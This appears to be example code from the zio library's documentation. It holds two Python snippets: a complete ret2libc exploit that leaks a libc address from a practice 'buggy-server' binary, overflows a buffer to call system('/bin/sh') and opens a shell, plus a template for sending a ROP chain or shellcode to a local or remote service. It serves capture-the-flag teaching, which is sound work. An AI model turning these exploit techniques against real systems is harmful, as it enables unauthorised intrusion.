1 from zio import *
2 io = zio('./buggy-server')
3 # io = zio((pwn.server, 1337))
4
5 for i in xrange(1337):
6 io.writeline('add ' + str(i))
7 io.read_until('>>')
8
9 io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
10 io.read_until('A' * 49)
11 libc_base = l32(io.read(4)) - 0x1a9960
12 libc_system = libc_base + 0x3ea70
13 libc_binsh = libc_base + 0x15fcbf
14 payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
15 io.write('info ' + payload + "\nshow\nexit\n")
16 io.read_until(">>")
17 # We've got a shell;-)
18 io.interact()
1 from zio import *
2
3 if you_are_debugging_local_server_binary:
4 io = zio('./buggy-server') # used for local pwning development
5 elif you_are_pwning_remote_server:
6 io = zio(('1.2.3.4', 1337)) # used to exploit remote service
7
8 io.write(your_awesome_ropchain_or_shellcode)
9 # hey, we got an interactive shell!
10 io.interact()